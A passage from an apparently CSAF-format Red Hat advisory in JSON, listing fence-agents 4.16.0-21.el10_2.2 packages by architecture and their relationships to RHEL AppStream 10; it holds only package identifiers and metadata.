"product_id": "ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ha-cloud-support-debuginfo@4.16.0-21.el10_2.2?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.aarch64",
"product": {
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.aarch64",
"product_id": "fence-agents-all-0:4.16.0-21.el10_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-all@4.16.0-21.el10_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.aarch64",
"product": {
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.aarch64",
"product_id": "fence-agents-common-0:4.16.0-21.el10_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-common@4.16.0-21.el10_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64",
"product": {
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64",
"product_id": "fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump@4.16.0-21.el10_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64",
"product": {
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64",
"product_id": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt@4.16.0-21.el10_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64",
"product": {
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64",
"product_id": "fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-redfish@4.16.0-21.el10_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64",
"product": {
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64",
"product_id": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debugsource@4.16.0-21.el10_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"product": {
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"product_id": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-common-debuginfo@4.16.0-21.el10_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"product": {
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"product_id": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debuginfo@4.16.0-21.el10_2.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"product": {
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"product_id": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump-debuginfo@4.16.0-21.el10_2.2?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-all@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-common-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-common@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-openstack@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-redfish@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debugsource@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-common-debuginfo@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debuginfo@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"product": {
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"product_id": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump-debuginfo@4.16.0-21.el10_2.2?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-all-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-all@4.16.0-21.el10_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-common-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-common-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-common@4.16.0-21.el10_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump@4.16.0-21.el10_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt@4.16.0-21.el10_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-redfish@4.16.0-21.el10_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-zvm@4.16.0-21.el10_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debugsource@4.16.0-21.el10_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-common-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-common-debuginfo@4.16.0-21.el10_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debuginfo@4.16.0-21.el10_2.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"product": {
"name": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"product_id": "fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump-debuginfo@4.16.0-21.el10_2.2?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-amt-ws@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-apc-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-apc-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-apc-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-apc@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-apc-snmp-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-apc-snmp@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-bladecenter-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-bladecenter@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-brocade-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-brocade@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-cisco-mds-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-cisco-mds@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-cisco-ucs-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-cisco-ucs@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-drac5@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-eaton-snmp@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-emerson@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-eps-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-eps-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-eps-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-eps@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-heuristics-ping@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-hpblade@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ibm-powervs@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ibm-vpc@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ibmblade@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ifmib@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ilo-moonshot@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ilo-mp@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ilo-ssh@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ilo2@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-intelmodular@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ipdu@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-ipmilan@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-lpar@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-mpath@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-nutanix-ahv@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-rhevm@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-rsa@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-rsb@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-sbd@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-scsi@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-virsh@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-vmware-rest@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-vmware-soap@4.16.0-21.el10_2.2?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-wti-0:4.16.0-21.el10_2.2.noarch",
"product": {
"name": "fence-agents-wti-0:4.16.0-21.el10_2.2.noarch",
"product_id": "fence-agents-wti-0:4.16.0-21.el10_2.2.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-wti@4.16.0-21.el10_2.2?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-0:4.16.0-21.el10_2.2.src as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-0:4.16.0-21.el10_2.2.src"
},
"product_reference": "fence-agents-0:4.16.0-21.el10_2.2.src",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-aliyun-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.aarch64"
},
"product_reference": "fence-agents-all-0:4.16.0-21.el10_2.2.aarch64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le"
},
"product_reference": "fence-agents-all-0:4.16.0-21.el10_2.2.ppc64le",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.s390x"
},
"product_reference": "fence-agents-all-0:4.16.0-21.el10_2.2.s390x",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-all-0:4.16.0-21.el10_2.2.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-all-0:4.16.0-21.el10_2.2.x86_64"
},
"product_reference": "fence-agents-all-0:4.16.0-21.el10_2.2.x86_64",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-amt-ws-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-apc-0:4.16.0-21.el10_2.2.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.2.Z:fence-agents-apc-0:4.16.0-21.el10_2.2.noarch"
},
"product_reference": "fence-agents-apc-0:4.16.0-21.el10_2.2.noarch",
"relates_to_product_reference": "AppStream-10.2.Z"
},
{
"category": "default_component_of",
"full_product_name": {
